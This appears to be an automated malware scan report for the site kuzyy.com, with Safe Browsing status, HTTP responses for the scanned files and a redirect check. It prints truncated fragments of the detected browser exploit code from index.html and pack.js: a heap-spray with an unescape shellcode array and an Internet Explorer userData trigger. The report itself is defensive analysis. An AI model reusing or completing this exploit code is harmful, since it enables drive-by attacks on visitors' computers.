Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kuzyy.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.kuzyy.com/ | HTTP/1.1 302 Found Connection: Close Location: /?WebShieldDRSessionVerify=slVNmy4j6Y6W93cPrYf6 Server: Safedog/4.0.0 Content-Length: 0 Content-Type: text/html | clean |
http://www.kuzyy.com/?webshielddrsessionverify=slvnmy4j6y6w93cpryf6 | HTTP/1.1 302 Found Connection: Close Location: /?webshielddrsessionverify=slvnmy4j6y6w93cpryf6&WebShieldDRSessionVerify=slVNmy4j6Y6W93cPrYf6 Server: Safedog/4.0.0 Content-Length: 0 Content-Type: text/html | clean |
http://www.kuzyy.com/?webshielddrsessionverify=slvnmy4j6y6w93cpryf6&webshielddrsessionverify=slvnmy4j6y6w93cpryf6 | HTTP/1.1 302 Found Connection: Close Location: /?webshielddrsessionverify=slvnmy4j6y6w93cpryf6&webshielddrsessionverify=slvnmy4j6y6w93cpryf6&WebShieldDRSessionVerify=w87z8JHWuOiEiv2XtjgX Server: Safedog/4.0.0 Content-Length: 0 Content-Type: text/html | clean |
http://www.kuzyy.com/?webshielddrsessionverify=slvnmy4j6y6w93cpryf6&webshielddrsessionverify=slvnmy4j6y6w93cpryf6&webshielddrsessionverify=w87z8jhwuoieiv2xtjgx | HTTP/1.1 200 OK Date: Thu, 22 May 2014 21:37:11 GMT Accept-Ranges: bytes ETag: "4def46ef8f2ccf1:4e980" Server: IIS Content-Length: 1884 Content-Location: http://www.kuzyy.com/Index.html Content-Type: text/html Last-Modified: Tue, 18 Feb 2014 09:58:12 GMT X-Powered-By: WAF/2.0 | clean |
http://www.kuzyy.com/index.html | 200 OK Content-Length: 1884 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var CutePower = anheywangma(AnHey.replace (/CUTEQQ/g,'%u')); var CuteMoney = new Array() var CuteShine = 0x86000 - CutePower.length*2; var sss = Array(472,388,456,128,268,468,464,404,332,420,488,404,128,244,128,136,268,340,336,276,324,324,192,396,192,136,172,136,396,268,340,336,276,324,324,192,396,192,136,172,136,396,136,236,472,388,456,128,268,468,464,404,328,420,412,416,464,128,244,128,388,440,416,404,484,476,388,440,412,436, } } function ahwm() { var CuteLock = document.createElement("BODY"); CuteLock.addBehavior("#default#userData"); document.appendChild(CuteLock); try { for (i=0;i<10;i++) { CuteLock.setAttribute('s',window); } } catch(e) {} window.status+=''; } document.getElementById("evilcute").onclick(); Antivirus reports:
| ||
http://www.kuzyy.com/pack.js | 200 OK Content-Length: 176 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try {
new ActiveXObject("cuteqq"); } catch (e) { var ANHEI='\x25'+'u5'+'8'+'5'+EasyJob; var woshiahwm="%u"; var anheywangma=unescape; } Antivirus reports:
| ||
http://www.kuzyy.com/pack.css | 200 OK Content-Length: 4908 Content-Type: text/css | clean |
http://www.kuzyy.com/test404page.js | 200 OK Content-Length: 3169 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kuzyy.com
Result:
GET / HTTP/1.1
Host: kuzyy.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: kuzyy.com
Referer: http://www.google.com/search?q=kuzyy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kuzyy.com
Referer: http://www.google.com/search?q=kuzyy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.